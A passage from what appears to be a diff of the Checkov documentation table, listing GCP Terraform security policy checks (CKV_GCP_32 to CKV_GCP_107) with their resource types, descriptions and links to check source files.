-| 1619 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | 
-| 1620 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | 
-| 1621 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | 
[GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) | 
-| 1622 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | 
-| 1623 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | 
-| 1624 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | 
-| 1625 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | 
-| 1626 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | 
-| 1627 | CKV_GCP_35 | resource | 
google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | 
-| 1628 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | 
-| 1629 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | 
-| 1630 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | 
-| 1631 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) | 
-| 1632 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) | 
-| 1633 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | 
[GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | 
-| 1634 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | 
-| 1635 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | 
-| 1636 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | 
-| 1637 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | 
-| 1638 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | 
-| 1639 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | 
-| 1640 | CKV_GCP_41 | resource | 
google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | 
-| 1641 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) | 
-| 1642 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) | 
-| 1643 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | 
-| 1644 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | 
-| 1645 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | 
-| 1646 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles 
that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | 
-| 1647 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | 
-| 1648 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | 
-| 1649 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | 
-| 1650 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | 
-| 1651 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | 
-| 1652 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | 
[GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | 
-| 1653 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | 
-| 1654 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | 
-| 1655 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) | 
-| 1656 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) | 
-| 1657 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) | 
-| 1658 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | 
[GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) | 
-| 1659 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) | 
-| 1660 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) | 
-| 1661 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) | 
-| 1662 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) | 
-| 1663 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) | 
-| 1664 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | 
[GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) | 
-| 1665 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) | 
-| 1666 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) | 
-| 1667 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) | 
-| 1668 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) | 
-| 1669 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) | 
-| 1670 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) | 
-| 1671 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | 
[GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) | 
-| 1672 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | 
-| 1673 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | 
-| 1674 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | 
-| 1675 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | 
-| 1676 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) | 
-| 1677 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) | 
-| 1678 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | 
[GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | 
-| 1679 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | 
-| 1680 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) | 
-| 1681 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) | 
-| 1682 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) | 
-| 1683 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) | 
-| 1684 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | 
[GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) | 
-| 1685 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) | 
-| 1686 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) | 
-| 1687 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) | 
-| 1688 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) | 
-| 1689 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) | 
-| 1690 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) | 
-| 1691 | CKV_GCP_84 | resource | 
google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) | 
-| 1692 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) | 
-| 1693 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) | 
-| 1694 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) | 
-| 1695 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) | 
-| 1696 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) | 
-| 1697 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | 
[DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | -| 1698 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | -| 1699 | CKV_GCP_92 | resource | google_vertex_ai_dataset | Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) | -| 1700 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) | -| 1701 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) | -| 1702 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) | -| 1703 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) | -| 1704 | CKV_GCP_97 | resource | google_redis_instance | Ensure 
Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | -| 1705 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 1706 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 1707 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 1708 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 1709 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 1710 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | 
[BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 1711 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 1712 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 1713 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 1714 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 1715 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | -| 1716 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | 
[DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | -| 1717 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | -| 1718 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) | -| 1719 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1720 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1721 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1722 | CKV_GCP_107 | 